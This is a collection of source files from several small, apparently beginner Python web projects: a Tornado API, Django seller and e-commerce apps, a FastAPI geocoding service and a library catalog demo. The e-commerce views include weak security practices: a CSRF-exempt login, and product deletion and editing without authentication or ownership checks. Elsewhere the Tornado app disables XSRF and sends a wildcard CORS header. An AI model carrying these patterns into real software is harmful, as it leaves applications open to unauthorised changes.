    def __init__(self):
        config = {
            'debug': settings.DEBUG,
            'xsrf_cookies': False,
            'gzip': True,
            'autoreload': False,
            'base_url': '/api/',
            'headers': {"Access-Control-Allow-Origin": "*"}
        }
        super(TestApiApplication, self).__init__(self.init_handlers(config), **config)

    def init_handlers(self, config):
        """Load the (URL pattern, handler) tuples for each component."""
        # Order matters: the first pattern to match the URL wins.
        base = config['base_url']
        routed = [
            (url_path_join(base, spec[0]),) + tuple(spec[1:])
            for spec in load_handlers('api.handlers')
        ]
        # Catch-all 404 goes last so it only fires when nothing matched.
        routed.append((r'(.*)', NotFoundHandler))
        return routed
--- FILE SEPARATOR ---
# encoding: utf-8
from __future__ import absolute_import, unicode_literals
import os
from config.local_settings import * # NOQA
# Debug mode is on unless the IS_DEBUG env var is exactly '0'.
DEBUG = os.environ.get('IS_DEBUG', '1') != '0'
TITLE = 'test'
# (name, code, message) triples — presumably registered as ErrCode members
# by tornadoapi (see ErrCode.ERR_ACTION_NOT_FOUND usage in api.handlers).
ERROR_CODE_DEFINE = (
    ('ERR_ACTION_NOT_FOUND', 10001, '未找到 action '),
)
--- FILE SEPARATOR ---
# encoding: utf-8
from __future__ import absolute_import, unicode_literals
import os
if __name__ == '__main__':
    # Settings module must be set before importing tornadoapi-dependent code.
    os.environ.setdefault("TORNADOAPI_SETTINGS_MODULE", "config.settings")
    from tornado import ioloop, httpserver
    from tornado.options import options, define, parse_command_line
    import tornadoapi
    from app import TestApiApplication
    # Initialise tornadoapi (loads settings) before building the app.
    tornadoapi.setup()
    define("port", default=8888, help="run on the given port", type=int)
    parse_command_line()
    io_loop = ioloop.IOLoop.instance()
    app = TestApiApplication()
    http_server = httpserver.HTTPServer(app)
    http_server.listen(options.port)
    print("server start in 0.0.0.0:%d" % options.port)
    # Blocks forever serving requests.
    io_loop.start()
|
[
"/api/handlers.py",
"/app.py",
"/config/settings.py",
"/main.py"
] |
007hakan/django-project
|
from django.contrib import admin
from .models import Satici
# Register your models here.
class SaticiAdmin(admin.ModelAdmin):
    """Admin list configuration for Satici: columns, filters and search."""
    list_display = ('id','header','text','created_date')
    list_display_links = ('id','header')
    list_filter = ("header",'created_date')
    search_fields = ('header','text')
    list_per_page = 10
admin.site.register(Satici,SaticiAdmin)
--- FILE SEPARATOR ---
from django.apps import AppConfig
class SaticiConfig(AppConfig):
    """App-registry entry for the satici (seller) app."""
    name = 'satici'
--- FILE SEPARATOR ---
from django import forms
from .models import Satici
class SaticiForm(forms.ModelForm):
    """ModelForm for creating/updating Satici listings (image, header, text)."""
    class Meta:
        model = Satici
        fields = [ 'img','header','text' ]
--- FILE SEPARATOR ---
from django.db import models
from datetime import datetime
# Create your models here.
class Satici(models.Model):
    """A seller listing: header/text content with an optional image."""
    header = models.CharField(max_length=200)
    text = models.TextField()
    img = models.ImageField(blank=True,verbose_name='Fotograf ekle')
    # Naive datetime default — NOTE(review): consider timezone-aware
    # django.utils.timezone.now if USE_TZ is enabled.
    created_date = models.DateTimeField(default = datetime.now,blank=True)
    def __str__(self):
        return self.header
--- FILE SEPARATOR ---
from django.urls import path
from . import views
# Namespaced CRUD routes for the satici app ('satici:index', etc.).
app_name='satici'
urlpatterns = [
    path("",views.index,name="index"),
    path("urunler/<int:satici_id>",views.urunler,name="urunler"),
    path("urun_ekle/",views.urun_ekle,name="urun_ekle"),
    path("urun_sil/<int:satici_id>",views.urun_sil,name="urun_sil"),
    path("urun_guncelle/<int:satici_id>",views.urun_guncelle,name="urun_guncelle"),
    path("about/",views.about,name="about"),
]
--- FILE SEPARATOR ---
from django import forms
class RegisterForm(forms.Form):
    """Sign-up form: username plus password with confirmation."""
    username = forms.CharField(max_length = 30, label = 'Username')
    password = forms.CharField(max_length =30, label ="Password", widget = forms.PasswordInput)
    confirm = forms.CharField(max_length =30, label ="Confirm Password", widget = forms.PasswordInput)

    def clean(self):
        """Check both password fields match; return the cleaned values."""
        username = self.cleaned_data.get("username")
        password = self.cleaned_data.get("password")
        confirm = self.cleaned_data.get("confirm")
        if password and confirm and confirm != password:
            # BUG FIX: was forms.ValdationError (typo) — that attribute does
            # not exist, so a mismatch crashed with AttributeError instead of
            # showing a form error.
            raise forms.ValidationError("Passwords did not match!")
        values = {
            'username': username,
            'password': password
        }
        return values
class LoginForm(forms.Form):
    """Simple username/password login form."""
    username = forms.CharField(label='Username')
    password = forms.CharField(label='Password',widget=forms.PasswordInput)
|
[
"/satici/admin.py",
"/satici/apps.py",
"/satici/forms.py",
"/satici/models.py",
"/satici/urls.py",
"/user/forms.py"
] |
007ksv/geoApp
|
from fastapi import APIRouter
from . import geo_coding, geo_distance, reverse_geocoding
# Aggregate router: mounts every feature router on one APIRouter,
# which src.main includes under the /v1 prefix.
main_router = APIRouter()
main_router.include_router(geo_coding.router)
main_router.include_router(reverse_geocoding.router)
main_router.include_router(geo_distance.router)
--- FILE SEPARATOR ---
from fastapi import APIRouter
router = APIRouter(tags=["Geo coding"])
# Imported after router creation so geo_code's endpoints register on it.
from .geo_code import *
--- FILE SEPARATOR ---
from src.models import GeocodingDetailModel, GeocodingModel
from src.utils.address import get_address_details
from src.utils.response import create_response
from . import router
@router.post("/address-detail")
def get_address_detail(adress: GeocodingModel):
    """Geocode the posted address; returns empty data when nothing is found."""
    detail = get_address_details(adress.address)
    if not detail:
        return create_response(success=True, data={})
    resolved = GeocodingDetailModel(**detail)
    return create_response(success=True, data=resolved.dict())
--- FILE SEPARATOR ---
from fastapi import APIRouter
router = APIRouter(tags=["Geo Distance"])
# Imported after router creation so geo_distance's endpoints register on it.
from .geo_distance import *
--- FILE SEPARATOR ---
from src.models import GeoDistanceModel
from src.utils.geo_distance import calculate_geo_distance
from src.utils.response import create_response
from . import router
@router.post("/geo-distance")
def get_geo_distance(coords: GeoDistanceModel):
    """Compute the distance between the two posted coordinate pairs."""
    first = (coords.geo_point1.latitude, coords.geo_point1.longitude)
    second = (coords.geo_point2.latitude, coords.geo_point2.longitude)
    dist = calculate_geo_distance(first, second, coords.result_in)
    return create_response(True, data={"result": dist})
--- FILE SEPARATOR ---
from fastapi import APIRouter
router = APIRouter(tags=["Reverse geocoding"])
# Imported after router creation so reverse_geocode's endpoints register on it.
from .reverse_geocode import *
--- FILE SEPARATOR ---
from src.models import GeocodingModel, ReverseGeocodingModel
from src.utils.address import get_reverse
from src.utils.response import create_response
from . import router
@router.post("/reverse")
def get_reverse_geocoding_details(coordinates: ReverseGeocodingModel):
    """Reverse-geocode a (lat, lon) pair; empty data when nothing matches."""
    found = get_reverse((coordinates.latitude, coordinates.longitude))
    if not found:
        return create_response(success=True, data={})
    return create_response(success=True, data=GeocodingModel(**found).dict())
--- FILE SEPARATOR ---
from fastapi import FastAPI
from .api.routes import main_router
from .utils.response import create_response
app = FastAPI(debug=True)
@app.get("/v1/")
def home():
    """Landing endpoint — confirms the service is up."""
    return create_response(True, data={"message": "Welcome to geoApp"})
# All feature routes live under the /v1 prefix.
app.include_router(main_router, prefix="/v1")
--- FILE SEPARATOR ---
from .geo_distance import *
from .geocoding import *
from .reverse_geocoding import *
--- FILE SEPARATOR ---
from typing import Optional
from pydantic import BaseModel, Field, validator
from .reverse_geocoding import ReverseGeocodingModel as CoordinatesModel
allowed_units = ["kilometers", "meters", "miles"]
class GeoDistanceModel(BaseModel):
    """Request body for /geo-distance: two coordinate pairs plus a unit."""
    geo_point1: CoordinatesModel
    geo_point2: CoordinatesModel
    result_in: Optional[str] = Field(
        "kilometers", description="Unit of result distance"
    )
    @validator("result_in")
    def validate_result_in(cls, value):
        """Accept any casing of a known unit; normalise to lowercase."""
        unit = value.lower()
        if unit not in allowed_units:
            raise ValueError("not a valid unit, options are " + ",".join(allowed_units))
        # BUG FIX: previously returned the original value, so mixed-case
        # input (e.g. "Miles") passed validation but then matched no branch
        # in utils.geo_distance.calculate_geo_distance.
        return unit
--- FILE SEPARATOR ---
from pydantic import BaseModel
from .reverse_geocoding import ReverseGeocodingModel
class GeocodingModel(BaseModel):
    """Payload carrying a free-form address string."""
    address: str
class GeocodingDetailModel(BaseModel):
    """Geocoding result: resolved address plus its coordinates."""
    address: str
    coordinates: ReverseGeocodingModel
--- FILE SEPARATOR ---
from pydantic import BaseModel, validator
class ReverseGeocodingModel(BaseModel):
    """A WGS84 coordinate pair with range validation."""

    latitude: float
    longitude: float

    @validator("latitude")
    def validate_latitude(cls, value):
        """Reject latitudes outside [-90, 90]."""
        if -90 <= value <= 90:
            return value
        raise ValueError("not a valid latitude")

    @validator("longitude")
    def validate_longitude(cls, value):
        """Reject longitudes outside [-180, 180]."""
        if -180 <= value <= 180:
            return value
        raise ValueError("not a valid longitude")
--- FILE SEPARATOR ---
from geopy.geocoders import Nominatim
def get_address_details(address: str):
    """Geocode *address* via Nominatim.

    Returns {'address': ..., 'coordinates': {'latitude': ..., 'longitude': ...}}
    or None when nothing is found or the lookup fails.
    """
    try:
        locator = Nominatim(user_agent="Keshav")
        address_detail = locator.geocode(address)
        res = {}
        if address_detail:
            res["address"] = address_detail.address
            res["coordinates"] = {
                "latitude": address_detail.latitude,
                "longitude": address_detail.longitude,
            }
            return res
        else:
            return None
    except Exception as e:
        # FIX: make the best-effort failure path explicit — previously the
        # function fell off the end, returning None only implicitly.
        print(e)
        return None
def get_reverse(coords: tuple):
    """Reverse-geocode a (lat, lon) tuple into {'address': ...}.

    Returns None when nothing is found or the lookup fails.
    """
    try:
        locator = Nominatim(user_agent="keshav")
        address = locator.reverse(coords)
        res = {}
        if address:
            res["address"] = address.address
            return res
        else:
            # BUG FIX: was a bare `None` expression — the `return` keyword
            # was missing, so the value was computed and discarded.
            return None
    except Exception as e:
        # Best-effort: log and signal failure rather than propagate.
        print(e)
        return None
--- FILE SEPARATOR ---
from geopy.distance import geodesic
def calculate_geo_distance(point1, point2, result_in):
    """Distance between two (lat, lon) points in the requested unit.

    Unknown units fall through to the raw geodesic object, matching the
    original branch structure.
    """
    measured = geodesic(point1, point2)
    if result_in in ("kilometers", "meters", "miles"):
        return getattr(measured, result_in)
    return measured
--- FILE SEPARATOR ---
def create_response(success, data):
    """Build the standard API envelope.

    When *success* is falsy the payload is forced to an empty dict so
    failed responses never carry partial data.
    """
    payload = data if success else {}
    return {"success": success, "data": payload}
|
[
"/src/api/routes/__init__.py",
"/src/api/routes/geo_coding/__init__.py",
"/src/api/routes/geo_coding/geo_code.py",
"/src/api/routes/geo_distance/__init__.py",
"/src/api/routes/geo_distance/geo_distance.py",
"/src/api/routes/reverse_geocoding/__init__.py",
"/src/api/routes/reverse_geocoding/reverse_geocode.py",
"/src/main.py",
"/src/models/__init__.py",
"/src/models/geo_distance.py",
"/src/models/geocoding.py",
"/src/models/reverse_geocoding.py",
"/src/utils/address.py",
"/src/utils/geo_distance.py",
"/src/utils/response.py"
] |
007sambhavjain/ecommerce
|
"""csd URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path,include
from main import views
from django.conf.urls.static import static
from django.conf import settings
# Project URL map. All custom views live in main/views.py; django-allauth
# supplies the /accounts/ authentication routes.
urlpatterns = [
    path('admin/', admin.site.urls),
    path('sign_up/', views.sign_up),
    path('sign_in/', views.sign_in),
    path('vendor/', views.vendor_profile,name='vendor'),
    path('product/<str:pk>', views.product,name='product'),
    path('delete/<str:pk>', views.delete_task,name='delete'),
    path('store/', views.store,name='store'),
    path('cart/<str:pk>', views.cart,name='cart'),
    path('quantity/<str:pk>', views.quantity,name='quantity'),
    path('carts/', views.carts,name='carts'),
    path('money/', views.money,name='money'),
    path('order/', views.order,name='order'),
    path('previous/', views.previous,name='previous'),
    path('prev/', views.previous_vendor,name='previous_vendor'),
    path('del/<str:pk>', views.delet,name='del'),
    path('accounts/', include('allauth.urls')),
    path('choice/', views.choice,name='choice'),
    path('signout/',views.sign_out,name='signout'),
]
# Serve user-uploaded media files (development convenience).
urlpatterns += static(settings.MEDIA_URL,document_root=settings.MEDIA_ROOT)
--- FILE SEPARATOR ---
from django import forms
from django.forms import ModelForm
from .models import *
class ProductForm(forms.ModelForm):
    """Vendor-facing form for creating/editing a Product listing."""
    class Meta:
        model = Product
        fields=['title','cost','image','description','quantity']
--- FILE SEPARATOR ---
# Generated by Django 3.0.6 on 2020-05-27 11:59
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated: relaxes Product FKs/quantity and adds Orderitem.

    Do not edit by hand — migration state must match migration history.
    """
    dependencies = [
        ('main', '0012_auto_20200526_1731'),
    ]
    operations = [
        migrations.AlterField(
            model_name='product',
            name='customer',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='customer', to='main.Customer'),
        ),
        migrations.AlterField(
            model_name='product',
            name='quantity',
            field=models.IntegerField(blank=True, default=0, null=True),
        ),
        migrations.AlterField(
            model_name='product',
            name='vendor',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='vendor', to='main.Vendor'),
        ),
        migrations.CreateModel(
            name='Orderitem',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('quantity', models.IntegerField(blank=True, default=0, null=True)),
                ('product', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='product', to='main.Product')),
            ],
        ),
    ]
--- FILE SEPARATOR ---
# Generated by Django 3.0.6 on 2020-05-27 20:35
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated: re-states FK options and adds ShippingAddress.

    Do not edit by hand — migration state must match migration history.
    """
    dependencies = [
        ('main', '0018_auto_20200527_1935'),
    ]
    operations = [
        migrations.AlterField(
            model_name='orderitem',
            name='product',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='product', to='main.Product'),
        ),
        migrations.AlterField(
            model_name='product',
            name='customer',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='customer', to='main.Customer'),
        ),
        migrations.AlterField(
            model_name='product',
            name='vendor',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='vendor', to='main.Vendor'),
        ),
        migrations.CreateModel(
            name='ShippingAddress',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('address', models.CharField(max_length=100)),
                ('city', models.CharField(max_length=100)),
                ('state', models.CharField(max_length=100)),
                ('zipcode', models.CharField(max_length=100)),
                ('date_added', models.DateTimeField(auto_now_add=True)),
                ('customer', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='main.Customer')),
                ('order', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='main.Orderitem')),
            ],
        ),
    ]
--- FILE SEPARATOR ---
from django.db import models
from django.contrib.auth.models import User
from django.utils import timezone
# Create your models here.
class Customer(models.Model):
    """A buyer profile linked 1:1 to a Django auth User, with a wallet."""
    user=models.OneToOneField(User,related_name='customer',on_delete=models.CASCADE,blank=True,null=True)
    name=models.CharField(max_length=50)
    mobile_number=models.CharField(max_length=20)
    # Wallet balance: topped up in views.money, spent in views.order.
    money=models.FloatField(default=0)
    def __str__(self):
        return self.name
class Vendor(models.Model):
    """A seller profile linked 1:1 to a Django auth User."""
    user=models.OneToOneField(User,related_name='vendor',on_delete=models.CASCADE,blank=True,null=True)
    name=models.CharField(max_length=50)
    mobile_number=models.CharField(max_length=20)
    def __str__(self):
        return self.name
class Product(models.Model):
    """A product listed by a vendor, optionally associated with a customer."""
    vendor=models.ForeignKey('Vendor',related_name='vendor',on_delete=models.CASCADE,blank=True,null=True)
    customer=models.ForeignKey('Customer',related_name='customer',on_delete=models.CASCADE,blank=True,null=True)
    title=models.CharField(max_length=20)
    cost=models.FloatField()
    image=models.ImageField(upload_to= '',null=True,blank=True)
    description=models.CharField(max_length=50,blank=True,null=True)
    quantity=models.FloatField(blank=True,null=True)
    def __str__(self):
        return self.title
    @property
    def imageURL(self):
        """URL of the product image, or '' when no image is attached."""
        try:
            url=self.image.url
        except ValueError:
            # FIX: was a bare `except:` — FieldFile.url raises ValueError
            # when no file is associated; don't mask unrelated errors.
            url=''
        return url
class Order(models.Model):
    """A finalised purchase line, created from an Orderitem at checkout."""
    customer=models.ForeignKey('Customer',on_delete=models.SET_NULL,null=True,blank=True)
    quantity=models.FloatField(default=1,blank=True,null=True)
    vend=models.ForeignKey('Vendor',related_name='vend',on_delete=models.CASCADE,null=True,blank=True)
    prod=models.ForeignKey('Product',related_name='prod',on_delete=models.CASCADE,blank=True,null=True)
    def __str__(self):
        return str(self.id)
class Orderitem(models.Model):
    """A cart line: product + quantity held by a customer before checkout."""
    product=models.ForeignKey('Product',related_name='product',on_delete=models.CASCADE,blank=True,null=True)
    quantity=models.FloatField(default=1,blank=True,null=True)
    custom=models.ForeignKey('Customer',related_name='custom',on_delete=models.CASCADE,blank=True,null=True)
    ven=models.ForeignKey('Vendor',related_name='ven',on_delete=models.CASCADE,null=True,blank=True)
    def __str__(self):
        return self.product.title
    @property
    def total(self):
        # Line total = unit cost * quantity.
        tot=(self.product.cost)*(self.quantity)
        return tot
# class Orderitem(models.Model):
# customer=models.ForeignKey(Customer,on_delete=models.SET_NULL,null=True,blank=True)
# product=models.ForeignKey(Product,on_delete=models.SET_NULL,null=True,blank=True)
# quantity=models.IntegerField(default=0,null=True)
# def __str__(self):
# return self.product.title
class ShippingAddress(models.Model):
    """Delivery address captured at checkout, reused when identical."""
    customer=models.ForeignKey(Customer,on_delete=models.SET_NULL,null=True,blank=True)
    order=models.ForeignKey(Orderitem,on_delete=models.SET_NULL,null=True,blank=True)
    address=models.CharField(max_length=100,null=False)
    city=models.CharField(max_length=100,null=False)
    state=models.CharField(max_length=100,null=False)
    def __str__(self):
        return self.address
--- FILE SEPARATOR ---
from django.shortcuts import render,redirect
from django.http import HttpResponse
from django.contrib.auth import login,authenticate,logout
from django.views.decorators.csrf import csrf_exempt
from .models import *
from .forms import *
import os
from sendgrid import SendGridAPIClient
from sendgrid.helpers.mail import Mail
# Create your views here.
def choice(request):
    """Send a logged-in user to the right home page, or let them pick a role.

    GET: existing customers go to /store/, existing vendors to /vendor/;
    otherwise render the role-choice form.
    POST: create the chosen profile (Customer or Vendor) for request.user.
    """
    if request.method=='GET':
        curr=request.user
        if curr:
            if Customer.objects.filter(user=curr):
                return redirect('/store/')
            if Vendor.objects.filter(user=curr):
                # BUG FIX: was `return('/vendor/')`, which returned a plain
                # string instead of an HTTP redirect response.
                return redirect('/vendor/')
            else:
                return render(request,'main/choice.html')
    if request.method=='POST':
        curr=request.user
        usertype = request.POST.get('type')
        if usertype == 'customer':
            cust = Customer.objects.create(user=request.user)
            cust.save()
            return redirect('/store/')
        if usertype == 'vendor':
            venr = Vendor.objects.create(user=request.user)
            venr.save()
            # BUG FIX: was `return('/vendor/')` (a string, not a response).
            return redirect('/vendor/')
def sign_up(request):
    """Create a User plus a Customer or Vendor profile from the sign-up form.

    NOTE(review): after a successful registration this re-renders the
    sign-up page instead of redirecting or logging the user in — confirm
    that is intended.
    """
    if request.method== 'GET':
        return render(request,'main/sign_up.html')
    if request.method=='POST':
        username = request.POST.get('username')
        password = request.POST.get('password')
        name = request.POST.get('name')
        phone_number = request.POST.get('phone')
        usertype = request.POST.get('type')
        # Reject malformed input before touching the database.
        if len(phone_number) != 10:
            return HttpResponse('Phone number must be 10 digits long')
        if User.objects.filter(username=username).exists():
            return HttpResponse('Username already taken!')
        user = User.objects.create_user(username=username, password=password)
        # Exactly one of the two profile kinds is created, keyed by 'type'.
        if usertype == 'customer':
            cust = Customer.objects.create(user=user, name=name, mobile_number=phone_number)
            cust.save()
        if usertype == 'vendor':
            venr = Vendor.objects.create(user=user, name=name, mobile_number=phone_number)
            venr.save()
        return render(request,'main/sign_up.html')
@csrf_exempt
def sign_in(request):
    """Authenticate a user and send them to their customer/vendor home."""
    if request.method=='GET':
        return render(request,'main/sign_in.html')
    if request.method=='POST':
        username = request.POST.get('username')
        password = request.POST.get('password')
        user = authenticate(username=username, password=password)
        if user is not None:
            if Customer.objects.filter(user=user):
                login(request,user)
                return redirect('/store/')
            if Vendor.objects.filter(user=user):
                login(request,user)
                return redirect('/vendor/')
        # BUG FIX: previously fell through and returned None (a 500 in
        # Django) on bad credentials or a user with neither profile.
        return HttpResponse('Invalid credentials or no profile found!')
def vendor_profile(request):
    """Vendor dashboard: list the vendor's products and accept new ones.

    NOTE(review): authenticated non-vendor users fall through returning
    None — consider redirecting them instead.
    """
    if not request.user.is_authenticated:
        return HttpResponse('User is not authenticated!')
    curr=request.user
    if Vendor.objects.filter(user=curr):
        form = ProductForm()
        vend = Vendor.objects.get(user=curr)
        pro=Product.objects.filter(vendor=vend)
        if request.method == 'POST':
            # BUG FIX: request.FILES was not passed, so the form's image
            # upload was never bound and could not be saved.
            form = ProductForm(request.POST, request.FILES)
            if form.is_valid():
                product = form.save(commit=False)
                product.vendor=vend
                product.save()
                return redirect('/vendor/')
        return render(request,'main/vendor.html',{'pro': pro,'form':form})
def product(request,pk):
    """Edit an existing product (vendor side): form on GET, save on POST."""
    if not request.user.is_authenticated:
        return HttpResponse('user not authenticated')
    prod=Product.objects.get(id=str(pk))
    form = ProductForm(instance=prod)
    if request.method=='POST':
        # BUG FIX: request.FILES was missing, so replacing the product
        # image silently never saved the uploaded file.
        form = ProductForm(request.POST, request.FILES, instance=prod)
        if form.is_valid():
            form.save()
            return redirect('/vendor/')
    context={'form':form}
    return render(request,'main/product.html',context)
def delete_task(request,pk):
    """Confirm (GET) and perform (POST) deletion of a product."""
    item = Product.objects.get(id=str(pk))
    if request.method == 'POST':
        item.delete()
        return redirect('/vendor')
    return render(request, 'main/delete.html', {'item': item})
def store(request):
    """Storefront: list every product for an authenticated customer.

    NOTE(review): authenticated non-customer users fall through returning
    None (a 500 in Django) — confirm vendors should be redirected instead.
    """
    if not request.user.is_authenticated:
        return HttpResponse('User is not authenticated!')
    curr=request.user
    if Customer.objects.filter(user=curr):
        product=Product.objects.all()
        context={'product':product}
        return render(request,'main/store.html',context)
def cart(request,pk):
    """Add product *pk* to the customer's cart (quantity 1), then show it.

    If the product is already in the cart, redirect to /carts/ instead.
    NOTE(review): this mutates state on GET — confirm that is intended.
    """
    if request.user.is_authenticated:
        curr=request.user
        if Customer.objects.filter(user=curr):
            if request.method=='GET':
                cust=Customer.objects.get(user=curr)
                product=Product.objects.get(id=str(pk))
                # NOTE(review): request.POST is empty on GET, so quan is
                # always None and unused below.
                quan=request.POST.get('quantity')
                y=Orderitem.objects.filter(custom=cust,product=product)
                if y:
                    return redirect('/carts/')
                else:
                    order=Orderitem.objects.create(custom=cust,product=product,quantity=1,ven=product.vendor)
                items=Orderitem.objects.all().filter(custom=cust)
                tot=sum([item.total for item in items])
                context={'items':items,'cust':cust,'tot':tot}
                return render(request,'main/cart.html',context)
def quantity(request,pk):
    """Update the cart quantity for product *pk* (POST) or show the form (GET)."""
    if request.user.is_authenticated:
        curr=request.user
        if Customer.objects.filter(user=curr):
            if request.method=='POST':
                cust=Customer.objects.get(user=curr)
                product=Product.objects.get(id=str(pk))
                quan=request.POST.get('quantity')
                order=Orderitem.objects.get(custom=cust,product=product)
                # NOTE(review): quan is the raw form string; FloatField
                # coerces on save — confirm non-numeric input is rejected
                # upstream.
                order.quantity=quan
                order.save()
                return redirect('/carts/')
            if request.method=='GET':
                return render(request,'main/quantity.html')
def carts(request):
    """Show the authenticated customer's cart items with the grand total."""
    if request.user.is_authenticated:
        who = request.user
        if Customer.objects.filter(user=who):
            buyer = Customer.objects.get(user=who)
            entries = Orderitem.objects.filter(custom=buyer)
            grand_total = sum(entry.total for entry in entries)
            return render(request, 'main/carts.html',
                          {'items': entries, 'cust': buyer, 'tot': grand_total})
def money(request):
    """Top up the customer's wallet: form on GET, add the amount on POST."""
    if request.user.is_authenticated:
        curr=request.user
        if Customer.objects.filter(user=curr):
            # On GET this is None (unused in that branch).
            mon=request.POST.get('money')
            if request.method=='GET':
                return render(request,'main/money.html')
            if request.method=='POST':
                cust=Customer.objects.get(user=curr)
                # NOTE(review): float(mon) raises on missing/non-numeric
                # input — confirm the form enforces a number.
                cust.money+=float(mon)
                cust.save()
                return redirect('/carts/')
def order(request):
    """Checkout: validate stock and wallet, create Order rows, clear the cart.

    NOTE(review): product stock is decremented *while* validating, so a
    failure partway through leaves earlier items already decremented without
    an order being placed — consider validating first or using a transaction.
    """
    if request.user.is_authenticated:
        curr=request.user
        if Customer.objects.filter(user=curr):
            cust=Customer.objects.get(user=curr)
            order=Orderitem.objects.all().filter(custom=cust)
            tot=sum([it.total for it in order])
            if request.method=='GET':
                return render(request,'main/order.html')
            if request.method=='POST':
                adress = request.POST.get('adress')
                city = request.POST.get('city')
                state = request.POST.get('state')
                # Reuse an identical saved address when one exists.
                if ShippingAddress.objects.filter(customer=cust,address=adress,city=city,state=state):
                    ship=ShippingAddress.objects.get(customer=cust,address=adress,city=city,state=state)
                else:
                    ship=ShippingAddress.objects.create(customer=cust,address=adress,city=city,state=state)
                if cust.money>=tot:
                    for item in order:
                        if item.quantity!=0:
                            if item.product.quantity>=item.quantity :
                                item.product.quantity-=item.quantity
                                item.product.save()
                            else:
                                return HttpResponse(str(item.product.title) + ' has only '+ str(item.product.quantity) + ' left. so cannot place order ')
                        else:
                            return HttpResponse('cannot order 0 product')
                else:
                    return HttpResponse("you don't have enough money")
                # Deduct the total and convert each cart line into an Order.
                cust.money-=tot
                cust.save()
                for item in order:
                    final=Order.objects.create(customer=cust,quantity=item.quantity,vend=item.ven,prod=item.product)
                    item.delete()
                return render(request,'main/final.html',{'ship':ship})
def previous(request):
    """Show the authenticated customer's past orders."""
    if request.user.is_authenticated:
        who = request.user
        if Customer.objects.filter(user=who):
            buyer = Customer.objects.get(user=who)
            history = Order.objects.filter(customer=buyer)
            return render(request, 'main/previous.html', {'order': history})
def previous_vendor(request):
    """Show orders that were placed against the authenticated vendor."""
    if request.user.is_authenticated:
        who = request.user
        if Vendor.objects.filter(user=who):
            seller = Vendor.objects.get(user=who)
            history = Order.objects.filter(vend=seller)
            return render(request, 'main/previous_vendor.html', {'order': history})
def delet(request,pk):
    """Remove product *pk* from the cart: confirm on GET, delete on POST."""
    if request.user.is_authenticated:
        curr=request.user
        if Customer.objects.filter(user=curr):
            cust=Customer.objects.get(user=curr)
            product=Product.objects.get(id=str(pk))
            order=Orderitem.objects.get(custom=cust,product=product)
            if request.method=='POST':
                order.delete()
                return redirect('/carts/')
            if request.method=='GET':
                return render(request,'main/dele.html',{'order':order})
def sign_out(request):
    """Log the current user out, guarding against anonymous requests."""
    if request.user.is_authenticated:
        logout(request)
        return HttpResponse('User has been logged out')
    return HttpResponse('User is not signed in, so he cannot sign out')
|
[
"/csd/urls.py",
"/main/forms.py",
"/main/migrations/0013_auto_20200527_1159.py",
"/main/migrations/0019_auto_20200527_2035.py",
"/main/models.py",
"/main/views.py"
] |
007urmi/Edyoda_python
|
# -*- coding: utf-8 -*-
from Book import Book
from Catalog import Catalog
from User import Member, Librarian
#b1 = Book('Shoe Dog','Phil Knight', '2015',312)
#b1.addBookItem('123hg','H1B2')
#b1.addBookItem('124hg','H1B3')
#b1.printBook()
# Build a demo catalog: three titles, each with its physical copies
# (isbn, rack-location pairs).
catalog = Catalog()
b = catalog.addBook('Shoe Dog','Phil Knight', '2015',312)
catalog.addBookItem(b, '123hg','H1B2')
catalog.addBookItem(b, '124hg','H1B4')
catalog.addBookItem(b, '125hg','H1B5')
b = catalog.addBook('Moonwalking with Einstien','J Foer', '2017',318)
catalog.addBookItem(b, '463hg','K1B2')
b = catalog.addBook('Pax','Sara Pennypacker', '2017', 288)
catalog.addBookItem(b,'554jk','M24A')
catalog.addBookItem(b,'556jk','M25A')
catalog.addBookItem(b,'557jk','M26A')
#catalog.displayAllBooks()
# #member
# m1 = Member("Vish","Bangalore",23,'asljlkj22','std1233')
# m1.availableBooks(catalog)
# print (m1)
# #print (librarian)
# m1.issueBook('Moonwalking with Einstien',catalog)
# m1.returnBook('Moonwalking with Einstien',catalog)
#
# catalog.displayAllBooks()
#b = catalog.searchByName('Shoe Dog')
#print (b)
#b = catalog.searchByAuthor('J Foer')
#print(b)
# Remove one copy, then the whole title, and show what remains.
catalog.removeBookItem('Shoe Dog','124hg')
catalog.removeBook('Shoe Dog')
catalog.displayAllBooks()
# #reference to Librarian class object
# librarian = Librarian("Awantik","Bangalore",34,'asljlkj22','zeke101')
# # adding a book by librarian
# b2 =librarian.addBook("This is Going to Hurt: Secret Diaries of a Junior Doctor","Adam Key",'2017', 302,catalog)
# #adding details
# librarian.addBookItem(b2,'234c','l203',catalog)
# #displaying all the books till now added
# librarian.displayAddedBook(catalog)
# #library remove book
# librarian.removeBook('Shoe Dog')
# #displaying book after removing
# librarian.displayAddedBook(catalog)
--- FILE SEPARATOR ---
from Catalog import Catalog
from User import Member
# Demo script: populate a catalog, exercise remove/search, then issue
# and return a book as a member.
catalog = Catalog()
b = catalog.addBook('Shoe Dog','Phil Knight', '2015',312)
catalog.addBookItem(b, '123hg','H1B2')
catalog.addBookItem(b, '124hg','H1B4')
catalog.addBookItem(b, '125hg','H1B5')
b = catalog.addBook('Moonwalking with Einstien','J Foer', '2017',318)
